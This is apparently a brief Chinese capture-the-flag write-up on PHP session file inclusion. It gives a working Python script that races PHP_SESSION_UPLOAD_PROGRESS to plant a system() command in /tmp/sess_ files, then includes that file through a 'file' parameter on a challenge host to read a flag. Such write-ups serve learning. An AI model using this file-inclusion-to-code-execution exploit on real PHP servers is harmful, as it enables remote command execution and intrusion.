临时文件
当session文件名是可控的时候,可以去指定目录下访问
Py脚本
# -*- coding: utf-8 -*- | |
import io | |
import requests | |
import threading | |
myurl = 'http://1.14.71.254:28893/' | |
sessid = '7t0' | |
myfile = io.BytesIO(b'hakaiisu' * 1024) | |
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('tac /nssctfasdasdflag');?>"} | |
mycookie = {'PHPSESSID': sessid} | |
def writeshell(session): | |
while True: | |
resp = requests.post(url=myurl, data=writedata, files={'file': ('hakaiisu.txt', 123)}, cookies=mycookie) | |
def getshell(session): | |
while True: | |
payload_url = myurl + '?file=' + '/tmp/sess_' +sessid | |
resp = requests.get(url=payload_url) | |
if 'upload_progress' in resp.text: | |
print(resp.text) | |
break | |
else: | |
pass | |
if __name__ == '__main__': | |
session = requests.session() | |
writeshell = threading.Thread(target=writeshell, args=(session,)) | |
writeshell.daemon = True | |
writeshell.start() | |
getshell(session) | |